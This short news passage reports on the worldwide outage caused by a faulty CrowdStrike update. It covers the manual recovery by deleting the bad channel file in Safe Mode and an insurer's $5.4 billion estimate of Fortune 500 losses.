The outage disrupted airlines, banks and media companies around the world. CrowdStrike identified the cause quickly and worked with Microsoft on remediation. Because crashed hosts could not pick up the corrected file on their own, recovery meant booting each machine into Safe Mode or the Windows Recovery Environment and deleting the faulty channel file (C-00000291*.sys) from the CrowdStrike driver directory, or restoring from backup; BitLocker-protected machines needed their recovery keys first. CrowdStrike and Microsoft published recovery tools and guidance, but full restoration was expected to take days. Insurer Parametrix estimated the loss to U.S. Fortune 500 companies at $5.4 billion, little of it covered by insurance. CrowdStrike's official website carries the ongoing updates.
